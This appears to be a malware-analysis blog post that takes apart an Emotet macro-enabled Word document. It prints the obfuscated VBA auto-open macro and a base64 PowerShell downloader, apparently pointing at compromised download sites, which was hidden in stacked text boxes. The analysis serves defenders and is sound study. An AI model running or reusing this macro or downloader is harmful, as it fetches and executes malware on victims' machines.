Summary
Emotet is a modular delivery platform that has consistently dominated the commodity malware threat landscape over the past couple of years. It has evolved from a straightforward banking trojan into a full-fledged malware distribution service, delivering a variety of payloads for other threat actor groups. The U.S. Department of Homeland Security states that Emotet infections cost state and local governments up to $1 million to remediate.
In early June, its operators, known as Mummy Spider or TA542 appear to have taken an extended hiatus until August 22, when the command & control (C&C) infrastructure came back to life and began to update and reestablish contact with compromised hosts. On Monday, September 16 the botnet resumed spamming operations with new malicious documents to deliver updated payloads/binaries.
There has already been significant coverage from multiple sources, and I won’t bother to rehash too much of the overall campaign and operational analysis that has been produced by other researchers. Please check out these resources for some more detailed information:
- Talos Blog: Emotet is back after a summer break
- Malwarebytes Labs: Emotet is back: botnet springs back to life with new spam campaign
- Bleeping Computer: Emotet Trojan Evolves Since Being Reawakend, Here is What We Know
- threatpost: Emotet Returns from Summer Vacation, Ramps Up Stolen Email Tactic
Upon Emotet’s return, there appears to be limited operational updates, at least considering the extended break and the opportunity the actors had to re-tool. Some notable exceptions appear to be the splitting of the Epoch 1 C&C infrastructure into Epoch 1 and the freshly dubbed, Epoch 3 with new RSA keys; and apparently a new packer for the binary payload.
The new spam campaigns also appear to be delivering two different versions of maldocs to download the stage 1 payload. Some of these are ZIP files that use JavaScript to fetch the binary and others are the more “classic” style that leverage a VBA macro-enabled word document to execute a PowerShell script to download the initial binary. David Ledbetter has already published an excellent blog covering the ZIP>JavaScript style maldoc here:
That analysis inspired me to analyze some aspects of the Word DOC deliveries that may not have not been covered elsewhere, particularly by going in-depth into the DOC>VBA>PowerShell version that has typically consisted of the bulk of Emotet campaigns. Usually when triaging these types of maldocs, I simply extract the payload URLs for indicators of compromise (IOCs) as quickly as possible and move on with the investigation. But, it has been awhile since I’ve taken a look at Emotet, so I was interested in digging a little deeper for any new tactics, techniques, or procedures (TTPs) that could be uncovered with some static analysis of these malicious documents. So, the following section will purely focus on the maldoc itself and some of the sneaky tricks Mummy Spider is using to avoid detection by controls and obfuscate their malicious code. Let’s go.
The Word DOC and how the VBA code is hidden
The sample we will be taking a look at was from September 18, and the same as one mentioned in a blog post over at Malware Traffic Analysis:
- SHA256: cff8d68e20920ba54a2842961706a6d210ddc344194861f654de469e555259ca
The first thing to note is the new document template presented for the intended victim, prompting them to enable macros in order to view protected content. Of course, this is all lies, and if the User ignores the security warning and macros are enabled, the infection chain will proceed.
Now, as noted above, we would typically opt for the easy way to get at the IOCs, using tools such as olevba/ViperMonkey or simply copying out the final PowerShell from an online sandbox. However, for our purposes here, we are mainly interested in an exercise to identify the underlying construction of the maldoc, so we will take the road less traveled on our way to the final PowerShell downloader.
First up, we want to open the Visual Basic editor in Microsoft Word to get our initial look at the VBA code and see what we’re up against.
There are multiple modules here, most of which are completely empty and can be ignored. We filter down to the final two hidden beneath the other layers to find the modules with the actual macro code.
The VBA script in these two modules is actually quite short compared to the samples I have encountered in the past with this malware variant. It was previously common for there to be thousands of lines of junk code that needed to be parsed out before the functional code would take shape. Below we see a very manageable 173 lines of code:
Function UUz0RJI() On Error Resume Next For Each RHiKkiLG In A5M2p7jK For Each G75P1US In qJEc7IRb Dim GIYjspC, nB9SYV, LPUPL1N Dim wcQtYfJ, ZuaMkz, i422qG CMCU7SLC = Sqr(imiXhzrE * zBqizFPU) Next Do Dim NV_0VSGS, dYD3M3, RCKlPU Dim bfi2D2, XPmfBPs, iXl0wV6d iipGpOUw = Hex(cIt0mZ9P * EVw6k9) Loop Until lJnXC2 Eqv pI8QsdFp Next Ww_KhOVz = G2wST3 + zG09JQ(ThisDocument.RjQh9O8r + ThisDocument.YjCTu6) + iOcZRt On Error Resume Next For Each XzfowjXj In zp_dZk For Each kKK37jlj In iFNokz Dim ACjMki6, YDJ2lwq, qk27CPW Dim LEWEN34j, Zkq8Q0, CNERhtN iF_Q2R = Sqr(iNY2S0CO * oIol86u) Next Do Dim o8hn3O, Yk9pTD, nupvPCDG Dim rYEJFhh, mElhmcvj, ndFX7LK sv4aUaY = Hex(RfaHIM * INDTida) Loop Until wwAJ96d Eqv F3oQHN Next On Error Resume Next For Each YhwOWG In zfCLM4 For Each QKaoid3Q In WbRwPX Dim WGF6d2G, XwOpl1zO, ulAph_P Dim tLPpbqc, VskhKsac, rmciw82 Xi6OLrb = Sqr(Hz0JGJ * tWbSOE0z) Next Do Dim WncslwCR, YY2uIOT, jfSuDEi Dim Ld7bV4, mbMMG1BT, arK_vvT H4YoHS = Hex(hjCD9u * tCRlqQa) Loop Until wz9OsLI Eqv sEWzE6L Next VXMzL_3u = CreateObject("w" + zG09JQ("inPidormPidorgmPi" + "dortsPidor:PidorWPidorinPid" + "or3Pidor2Pidor_PidorP" + "rPidoroPidorPidorcePidorsPidors")).Create(Ww_KhOVz, Hrmr5j, QNm9jL2, qwVG3L) On Error Resume Next For Each WWWjLD2Y In iJu_wF2u For Each GG7zNa7h In B0N8cTL Dim nHUCsc, wwo5Ls, RbjVvIU_ Dim j8zii6Oj, oEOUtM9t, rQAHH4m jzVk9wi = Sqr(QtqqzUC * MmjKmO) Next Do Dim V8pbmT8C, WiQiLv, CvKdqE3 Dim i6dLHjE, o0sZtof, n8rbwnM l8Qkj8 = Hex(Gz6T7L * wjsnCh9) Loop Until FsqOG10 Eqv SaWMZv Next End Function Function zG09JQ(hs_BwF) On Error Resume Next For Each VjsX6M In iC5iYoMr For Each KSGqtMd0 In RprNb9K Dim nRE_bsO, Aa0u3KuN, pf67oSY_ Dim FaisH6nI, wfTj0Iq, biN3ZrF3 kDs4N1k = Sqr(j8il7c * JY9fmw) Next Do Dim K4jEBBDR, fQmGqYN, s04SZnY5 Dim wFPfEA9, Ml5Q4U1j, kkRM1V iJboIk = Hex(ZWviFtWW * zsA0jHr) Loop Until qo5aKOsX Eqv fdTYH1i Next zG09JQ = Replace(hs_BwF, Replace("$$$$P$i$d$$$or$", "$", ""), "") On Error Resume Next For Each rlot_b In padf9ZdD For Each kAzN0lN In mJB56iNs Dim ttcWBT, oIPrb1, bVnnCfI Dim fwjj9vsP, jPow6_T, jDsLUYA3 FXk8fah = Sqr(qXibhP5R * kntDa1w) Next Do Dim JL84nnz, PJXYjl, HmK8bGI Dim wXUKHsh, b4f6zt, wuJUHHaF lovEwi = Hex(W58Lb2c * n2Ozc7) Loop Until ULD3P5 Eqv awSicE8 Next End Function Sub autoopen() On Error Resume Next For Each H6WEbiFW In atJ0U9 For Each bANiUi4j In ajqhF5 Dim jOps_U, M5TzaSdT, XplwM4d Dim Xm0nP4IR, rB5oUT, PzODXv Wm4CzPI = Sqr(TRQE6SA * zYjBQi) Next Do Dim ICnaPN9, bZwVl5Z, BtKYhNXK Dim uZVYwI, s9IDSR, f52WfJvT YwfZCEY = Hex(BLA9Mjzi * wa47wmiU) Loop Until npB8SpSl Eqv CpnYbkk8 Next UUz0RJI On Error Resume Next For Each DtKTGVi In EU1_Jm For Each ZzUaAik In XvjPjA Dim HwT59GT, KZ4Q5z5, rMGEPkO Dim pPwjTSWA, djqAjp, K_i7ma ShFitq = Sqr(apkqFl * zlQFJLlZ) Next Do Dim B3W3nVj, q7Qk5Zdf, iFlFo7 Dim tBK8qj, M2oBOH8, wuBXqr RYTbzs8n = Hex(Gw4PrPPK * q2dI8AqM) Loop Until KUdNVLBM Eqv kZDb14 Next End Sub Function QNm9jL2() On Error Resume Next For Each bkDzkriq In X0Fkcszh For Each BPWWAZL In DRiQIo Dim tr8zMXA, AYT9Kf5J, LswLjz Dim i9s871F7, d13WGTYz, uwkHWX Djb_pjaS = Sqr(Yi4PqK * V3liztdX) Next Do Dim TllibK3T, JT7zUVT, hGZja9 Dim dusjSn, Td6CtXW3, F7zJcZlF wFKl62Sk = Hex(trU583 * cQuifo2l) Loop Until OS6MU57 Eqv QI4FwR Next Set QNm9jL2 = CreateObject(jDpfOwj + zG09JQ(ThisDocument.wN6iMqLL) + uh6wY9Z3) On Error Resume Next For Each K6iA7F In zKDvSVqq For Each ABDid8wf In wiQtjX Dim irWDzc8V, Od5h4_, AtcmNb Dim tj5UM6j8, h9OliHRz, LcmR6YX Cd61Bl = Sqr(RwW68j0 * waKUUaOw) Next Do Dim unazifp, lHN_Hr8, ZR7o7Dc8 Dim lDrCiLhz, qZRihnuu, hYbYTR kXXlms = Hex(BFtzk4C * E_YGST) Loop Until rTVmTtN Eqv FhnNwj Next QNm9jL2. _ ShowWindow! _ = zOG2hYj + RXjfH84 + TUItKNb + Cm8UjOvF + KHGpzAE + Bz2fiAf On Error Resume Next For Each tTjdK_1 In w3_Msb8 For Each r7nz4jj In CXqPPu Dim RLcMjKCZ, f7_BCA, XvFa890 Dim l4tnQn4G, LRvkXWf6, BVpn6S vPfNnYUh = Sqr(STG7RUY * JsDcDt3u) Next Do Dim Et0wJL, AoWQ2j, z9HEVP2 Dim B2zciwp, ltYf8u, UaU72f o5nT424 = Hex(GVtuj4 * c1VKcA) Loop Until L2aRsK Eqv zt3Cnb4 Next On Error Resume Next For Each fEh86Nsh In kQu1Aj For Each ET9KYC3 In EHNQTk Dim uWtMo0, LQi483z, oFwbriE Dim ja07YqLn, jKcUHt, RNYNTqvh oN3oXwXa = Sqr(t3rTwl * Rwotjsu) Next Do Dim VGSK3KY, SCwr9sP4, aEcs2aM Dim CsJ5vR, JHAsTd, piow7i OGa9Zcup = Hex(pLMJCa * Dv5vMmk) Loop Until tj7OjF Eqv h2_5uYV Next End Function
As usual, we want to immediately look for “Sub autoopen()” as this is the function that will execute on document open if the user has enabled content. The majority of the remaining code is junk, and only exists for anti-analysis purposes. All of the “Hex” and “Sqr” operations are meaningless red herrings and can be deleted. If any variable is initialized and never used, those can be removed as well.
Function UUz0RJI() Ww_KhOVz = zG09JQ(ThisDocument.RjQh9O8r + ThisDocument.YjCTu6) VXMzL_3u = CreateObject("w" + zG09JQ("inPidormPidorgmPi" + "dortsPidor:PidorWPidorinPid" + "or3Pidor2Pidor_PidorP" + "rPidoroPidorPidorcePidorsPidors")).Create(Ww_KhOVz, QNm9jL2) End Function Function zG09JQ(hs_BwF) zG09JQ = Replace(hs_BwF, Replace("$$$$P$i$d$$$or$", "$", ""), "") End Function Sub autoopen() UUz0RJI End Sub Function QNm9jL2() Set QNm9jL2 = CreateObject(zG09JQ(ThisDocument.wN6iMqLL)) QNm9jL2. _ ShowWindow! _ End Function
So clean-up gets us down to about 18 lines of relevant code that actually performs some operation. Unfortunately, none of this looks like PowerShell, so we must circle back to the document and look for more clues. We know there is some way the macro is using these variables to build the final downloader script. A couple clues we have to key in on are the following strings.
- “ThisDocument.RjQh9O8r”
- “ThisDocument.YjCTu6”
- “ThisDocument.wN6iMqLL”
- “Replace(“$$$$P$i$d$$$or$”, “$”, “”), “”)”
My first guess here was that the “ThisDocument” operations were creating objects and calling them from Class Modules somewhere in the Document itself. The “Replace” string is pretty straightforward and we can expect to do some character substitutions – nothing new for Emotet there. We will see how important these strings are shortly…
So we jumped back to the document template and deleted the main image. I’m getting older and my eyes aren’t what they used to be, so I almost missed the very tiny dot that was hidden underneath the image. It helped that it was subtly flashing because it was a cursor within a text box! To be exact, there are actually 20 text-boxes measuring .01″ by .01″ all stacked on top of each other.
I’ve seen a similar tactic like this before, but it was at most 3 boxes and they were clearly visible in the top left corner, not obscured by an image layer. I’m honestly not sure if this is actually new or I simply haven’t seen it before.
Anyways, it is possible to expand these out to get a better look at what is going on:
By taking a peek at the text box properties, we see that most of them are junk. However, there are three of interest that contain longer strings, and they just so happen to match the variable names of the “ThisDocument” objects we identified in the VBA script. One of the strings is crazy long and actually will not display in the text box because it is 10,987 characters long. Still, you can select the whitespace in the text box and copy it out. Spoilers……Prepare for some eyebleed:
poPidorwePidorrsPidorhePidorllPidor -PidorenPidorcoPidord wPidoriPidornPidormPidorgPidormPidortPidorsPidor:PidorWPidoriPidornPidor3Pidor2Pidor_PidorPPidorrPidoroPidorcPidorePidorsPidorsPidorSPidortPidoraPidorrPidortPidoruPidorp JPidorAPidorBPidor6PidorAPidorEPidorcPidorAPidorSPidorgPidorAPidor0PidorAPidorGPidor4PidorAPidorSPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidorbPidorAPidorBPidor2PidorAPidorDPidorMPidorAPidordPidorwPidorBPidorLPidorAPidorDPidorkPidorAPidorMPidorQPidorAPidor3PidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorEPidorwPidorAPidorSPidorgPidorBPidor1PidorAPidorEPidorYPidorAPidorcPidorgPidorAPidorzPidorAPidorCPidorAPidorAPidorPPidorQPidorAPidorgPidorAPidorCPidorcPidorAPidorOPidorAPidorAPidorzPidorAPidorDPidorUPidorAPidorJPidorwPidorAPidor7PidorAPidorCPidorQPidorAPidorVPidorQPidorBPidorQPidorAPidorEPidorsPidorAPidorcPidorgPidorBPidor3PidorAPidorGPidorEPidorAPidorUPidorAPidorAPidor9PidorAPidorCPidorcPidorAPidorcPidorQPidorBPidoriPidorAPidorGPidor8PidorAPidorYPidorwPidorBPidorPPidorAPidorFPidorMPidorAPidorQPidorwPidorAPidornPidorAPidorDPidorsPidorAPidorJPidorAPidorBPidoryPidorAPidorHPidorIPidorAPidorNPidorQPidorBPidorLPidorAPidorFPidorIPidorAPidordPidorQPidorBPidor3PidorAPidorDPidorEPidorAPidorPPidorQPidorAPidorkPidorAPidorGPidorUPidorAPidorbPidorgPidorBPidor2PidorAPidorDPidoroPidorAPidordPidorQPidorBPidorzPidorAPidorGPidorUPidorAPidorcPidorgPidorBPidorwPidorAPidorHPidorIPidorAPidorbPidorwPidorBPidormPidorAPidorGPidorkPidorAPidorbPidorAPidorBPidorlPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidorcPidorAPidorCPidorcPidorAPidorKPidorwPidorAPidorkPidorAPidorEPidorwPidorAPidorSPidorgPidorBPidor1PidorAPidorEPidorYPidorAPidorcPidorgPidorAPidorzPidorAPidorCPidorsPidorAPidorJPidorwPidorAPidoruPidorAPidorGPidorUPidorAPidorePidorAPidorBPidorlPidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorHPidoroPidorAPidorRPidorQPidorBPidor1PidorAPidorEPidorQPidorAPidoraPidorQPidorBPidorCPidorAPidorEPidorIPidorAPidorMPidorAPidorAPidor9PidorAPidorCPidorcPidorAPidorTPidorgPidorBPidorVPidorAPidorHPidoroPidorAPidorUPidorAPidorBPidorvPidorAPidorGPidorIPidorAPidorQPidorgPidorBPidorCPidorAPidorCPidorcPidorAPidorOPidorwPidorAPidorkPidorAPidorFPidorgPidorAPidordPidorAPidorBPidorfPidorAPidorEPidor0PidorAPidordPidorwPidorBPidorxPidorAPidorDPidor0PidorAPidorJPidorgPidorAPidoroPidorAPidorCPidorcPidorAPidorbPidorgPidorBPidorlPidorAPidorHPidorcPidorAPidorJPidorwPidorAPidorrPidorAPidorCPidorcPidorAPidorLPidorQPidorBPidorvPidorAPidorGPidorIPidorAPidoraPidorgPidorAPidornPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidorlPidorAPidorGPidorMPidorAPidordPidorAPidorAPidornPidorAPidorCPidorkPidorAPidorIPidorAPidorBPidorOPidorAPidorEPidorUPidorAPidordPidorAPidorAPidoruPidorAPidorHPidorcPidorAPidorRPidorQPidorBPidoriPidorAPidorGPidorMPidorAPidorTPidorAPidorBPidorJPidorAPidorGPidorUPidorAPidorTPidorgPidorBPidor0PidorAPidorDPidorsPidorAPidorJPidorAPidorBPidorkPidorAPidorGPidoroPidorAPidorNPidorgPidorBPidorkPidorAPidorGPidor0PidorAPidorcPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorAPidor6PidorAPidorCPidor8PidorAPidorLPidorwPidorBPidor0PidorAPidorGPidorgPidorAPidoraPidorQPidorBPidoruPidorAPidorGPidorgPidorAPidordPidorgPidorBPidor1PidorAPidorGPidor8PidorAPidorbPidorgPidorBPidornPidorAPidorGPidor0PidorAPidorZPidorQPidorBPidorkPidorAPidorGPidorkPidorAPidorYPidorQPidorAPidoruPidorAPidorGPidorMPidorAPidorbPidorwPidorBPidortPidorAPidorCPidor8PidorAPidordPidorwPidorBPidorwPidorAPidorCPidor0PidorAPidorYPidorQPidorBPidorkPidorAPidorGPidor0PidorAPidoraPidorQPidorBPidoruPidorAPidorCPidor8PidorAPidorbPidorgPidorAPidoryPidorAPidorGPidorsPidorAPidorZPidorQPidorBPidorlPidorAPidorHPidorAPidorAPidorNPidorwPidorAPidorvPidorAPidorEPidorAPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorBPidorzPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorGPidor0PidorAPidorbPidorgPidorBPidorwPidorAPidorGPidorEPidorAPidorcPidorwPidorBPidorhPidorAPidorGPidorwPidorAPidordPidorQPidorBPidoriPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidornPidorAPidorCPidor4PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor0PidorAPidorLPidorwPidorBPidor3PidorAPidorHPidorAPidorAPidorLPidorQPidorBPidorhPidorAPidorGPidorQPidorAPidorbPidorQPidorBPidorpPidorAPidorGPidor4PidorAPidorLPidorwPidorBPidoruPidorAPidorHPidorMPidorAPidorbPidorQPidorBPidor6PidorAPidorDPidorkPidorAPidorYPidorQPidorBPidor6PidorAPidorDPidorAPidorAPidorMPidorwPidorAPidoryPidorAPidorCPidor8PidorAPidorQPidorAPidorBPidoroPidorAPidorHPidorQPidorAPidordPidorAPidorBPidorwPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorHPidorQPidorAPidorcPidorgPidorBPidor1PidorAPidorGPidor4PidorAPidorZPidorwPidorBPidorhPidorAPidorGPidor4PidorAPidoraPidorAPidorAPidoruPidorAPidorHPidorgPidorAPidorePidorQPidorBPidor6PidorAPidorCPidor8PidorAPidordPidorwPidorBPidorwPidorAPidorCPidor0PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor4PidorAPidordPidorAPidorBPidorlPidorAPidorGPidor4PidorAPidordPidorAPidorAPidorvPidorAPidorHPidorUPidorAPidorePidorgPidorBPidorxPidorAPidorDPidorUPidorAPidorMPidorAPidorAPidorvPidorAPidorEPidorAPidorAPidoraPidorAPidorBPidor0PidorAPidorHPidorQPidorAPidorcPidorAPidorBPidorzPidorAPidorDPidoroPidorAPidorLPidorwPidorAPidorvPidorAPidorGPidorkPidorAPidorcPidorAPidorBPidor0PidorAPidorGPidorkPidorAPidordPidorgPidorBPidorpPidorAPidorGPidorMPidorAPidoraPidorQPidorBPidoruPidorAPidorGPidorkPidorAPidorLPidorgPidorBPidorjPidorAPidorGPidor8PidorAPidorbPidorQPidorAPidorvPidorAPidorGPidor4PidorAPidorcPidorAPidorBPidorrPidorAPidorHPidorgPidorAPidorLPidorwPidorBPidorqPidorAPidorHPidorcPidorAPidorcPidorAPidorBPidor5PidorAPidorDPidorkPidorAPidorMPidorwPidorAPidor4PidorAPidorCPidor8PidorAPidorQPidorAPidorBPidoroPidorAPidorHPidorQPidorAPidordPidorAPidorBPidorwPidorAPidorHPidorMPidorAPidorOPidorgPidorAPidorvPidorAPidorCPidor8PidorAPidordPidorwPidorBPidor3PidorAPidorHPidorcPidorAPidorLPidorgPidorBPidorjPidorAPidorGPidorUPidorAPidorePidorgPidorBPidorhPidorAPidorGPidorUPidorAPidordPidorgPidorBPidorpPidorAPidorGPidor4PidorAPidorZPidorQPidorBPidornPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidorkPidorAPidorGPidorUPidorAPidorcPidorgPidorAPidoruPidorAPidorGPidorMPidorAPidorbPidorwPidorBPidortPidorAPidorCPidor8PidorAPidorYPidorwPidorBPidorvPidorAPidorGPidor4PidorAPidorZPidorgPidorAPidorvPidorAPidorGPidorYPidorAPidorZPidorAPidorAPidor0PidorAPidorDPidorUPidorAPidorLPidorwPidorAPidornPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorTPidorAPidorHPidorAPidorAPidorbPidorAPidorBPidorgPidorAPidorEPidorkPidorAPidorVPidorAPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorwPidorBPidorAPidorAPidorCPidorcPidorAPidorKPidorQPidorAPidor7PidorAPidorCPidorQPidorAPidorVPidorAPidorBPidorkPidorAPidorFPidorgPidorAPidorbPidorgPidorBPidorpPidorAPidorDPidorAPidorAPidorUPidorgPidorAPidor9PidorAPidorCPidorcPidorAPidorZPidorAPidorAPidor0PidorAPidorDPidorcPidorAPidoraPidorQPidorBPidorNPidorAPidorDPidorQPidorAPidorMPidorAPidorAPidornPidorAPidorDPidorsPidorAPidorZPidorgPidorBPidorvPidorAPidorHPidorIPidorAPidorZPidorQPidorBPidorhPidorAPidorGPidorMPidorAPidoraPidorAPidorAPidoroPidorAPidorCPidorQPidorAPidorbPidorwPidorBPidorqPidorAPidorGPidoroPidorAPidorVPidorQPidorBPidorUPidorAPidorGPidor8PidorAPidoraPidorgPidorBPidorCPidorAPidorCPidorAPidorAPidoraPidorQPidorBPidoruPidorAPidorCPidorAPidorAPidorJPidorAPidorBPidorkPidorAPidorGPidoroPidorAPidorNPidorgPidorBPidorkPidorAPidorGPidor0PidorAPidorcPidorgPidorAPidorpPidorAPidorHPidorsPidorAPidordPidorAPidorBPidoryPidorAPidorHPidorkPidorAPidorePidorwPidorAPidorkPidorAPidorFPidorgPidorAPidordPidorAPidorBPidorfPidorAPidorEPidor0PidorAPidordPidorwPidorBPidorxPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorkPidorAPidorGPidor8PidorAPidordPidorwPidorBPidorOPidorAPidorEPidorwPidorAPidorYPidorAPidorBPidorPPidorAPidorEPidorEPidorAPidorYPidorAPidorBPidorEPidorAPidorGPidorYPidorAPidorYPidorAPidorBPidorpPidorAPidorEPidorwPidorAPidorRPidorQPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorAPidorBPidorvPidorAPidorGPidoroPidorAPidoraPidorgPidorBPidorVPidorAPidorFPidorQPidorAPidorbPidorwPidorBPidorqPidorAPidorEPidorIPidorAPidorLPidorAPidorAPidorgPidorAPidorCPidorQPidorAPidorcPidorgPidorBPidoryPidorAPidorDPidorUPidorAPidorSPidorwPidorBPidorSPidorAPidorHPidorUPidorAPidordPidorwPidorAPidorxPidorAPidorCPidorkPidorAPidorOPidorwPidorAPidorkPidorAPidorGPidor4PidorAPidorSPidorgPidorBPidorxPidorAPidorHPidorcPidorAPidorOPidorAPidorBPidorYPidorAPidorFPidorEPidorAPidorPPidorQPidorAPidornPidorAPidorEPidoroPidorAPidorQPidorQPidorBPidorBPidorAPidorEPidor4PidorAPidorUPidorQPidorBPidorPPidorAPidorDPidorMPidorAPidorVPidorwPidorAPidornPidorAPidorDPidorsPidorAPidorSPidorQPidorBPidormPidorAPidorCPidorAPidorAPidorKPidorAPidorAPidoroPidorAPidorCPidorYPidorAPidorKPidorAPidorAPidornPidorAPidorEPidorcPidorAPidorZPidorQPidorAPidornPidorAPidorCPidorsPidorAPidorJPidorwPidorBPidor0PidorAPidorCPidor0PidorAPidorSPidorQPidorBPidor0PidorAPidorGPidorUPidorAPidorJPidorwPidorAPidorrPidorAPidorCPidorcPidorAPidorbPidorQPidorAPidornPidorAPidorCPidorkPidorAPidorIPidorAPidorAPidorkPidorAPidorHPidorIPidorAPidorcPidorgPidorAPidor1PidorAPidorEPidorsPidorAPidorUPidorgPidorBPidor1PidorAPidorHPidorcPidorAPidorMPidorQPidorAPidorpPidorAPidorCPidor4PidorAPidorIPidorgPidorBPidorMPidorAPidorGPidorUPidorAPidorbPidorgPidorBPidorHPidorAPidorGPidorAPidorAPidorVPidorAPidorBPidoroPidorAPidorCPidorIPidorAPidorIPidorAPidorAPidortPidorAPidorGPidorcPidorAPidorZPidorQPidorAPidorgPidorAPidorDPidorIPidorAPidorOPidorQPidorAPidor4PidorAPidorDPidorAPidorAPidorNPidorAPidorAPidorpPidorAPidorCPidorAPidorAPidorePidorwPidorBPidorbPidorAPidorEPidorQPidorAPidoraPidorQPidorBPidorhPidorAPidorGPidorcPidorAPidorbPidorgPidorBPidorvPidorAPidorHPidorMPidorAPidordPidorAPidorBPidorpPidorAPidorGPidorMPidorAPidorcPidorwPidorAPidoruPidorAPidorFPidorAPidorAPidorcPidorgPidorBPidorvPidorAPidorGPidorMPidorAPidorZPidorQPidorBPidorzPidorAPidorHPidorMPidorAPidorXPidorQPidorAPidor6PidorAPidorDPidoroPidorAPidorIPidorgPidorBPidorTPidorAPidorFPidorQPidorAPidorYPidorAPidorBPidorBPidorAPidorHPidorIPidorAPidorVPidorAPidorAPidoriPidorAPidorCPidorgPidorAPidorJPidorAPidorBPidoryPidorAPidorHPidorIPidorAPidorNPidorQPidorBPidorLPidorAPidorFPidorIPidorAPidordPidorQPidorBPidor3PidorAPidorDPidorEPidorAPidorKPidorQPidorAPidor7PidorAPidorCPidorQPidorAPidorZPidorAPidorBPidormPidorAPidorHPidorYPidorAPidorNPidorQPidorBPidorqPidorAPidorDPidorUPidorAPidorPPidorQPidorAPidornPidorAPidorGPidor8PidorAPidorbPidorgPidorBPidorYPidorAPidorHPidorAPidorAPidordPidorgPidorBPidorxPidorAPidorCPidorcPidorAPidorOPidorwPidorBPidoriPidorAPidorHPidorIPidorAPidorZPidorQPidorBPidorhPidorAPidorGPidorsPidorAPidorOPidorwPidorAPidorkPidorAPidorGPidorwPidorAPidoraPidorgPidorBPidorqPidorAPidorEPidorEPidorAPidorWPidorAPidorBPidorMPidorAPidorDPidorAPidorAPidorPPidorQPidorAPidornPidorAPidorFPidorUPidorAPidorVPidorwPidorBPidortPidorAPidorHPidorIPidorAPidorcPidorgPidorAPidorxPidorAPidorCPidorcPidorAPidorfPidorQPidorBPidor9PidorAPidorGPidorMPidorAPidorYPidorQPidorBPidor0PidorAPidorGPidorMPidorAPidoraPidorAPidorBPidor7PidorAPidorHPidor0PidorAPidorfPidorQPidorAPidorkPidorAPidorGPidorkPidorAPidordPidorwPidorBPidorRPidorAPidorFPidorkPidorAPidordPidorwPidorBPidorQPidorAPidorDPidor0PidorAPidorJPidorwPidorBPidor3PidorAPidorGPidorgPidorAPidorWPidorAPidorBPidor6PidorAPidorFPidorYPidorAPidorUPidorAPidorBPidorpPidorAPidorCPidorcPidorA
So here we have our code from the three hidden text-boxes, but it still looks like a bunch of gibberish. But wait, do you remember the replace function we identified earlier?
- “Replace(“$$$$P$i$d$$$or$”, “$”, “”), “”)”
A quick google search for “Pidor” tells me that this is a vulgar Russian slur, and I’m assuming is intended as a charming message for those analyzing the code. I won’t go into much more detail here, but you can google and check out Urban Dictionary for yourself. Anyway, we can do a quick find/replace for “Pidor” and see what remains:
powershell -encod winmgmts:Win32_ProcessStartup JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6AD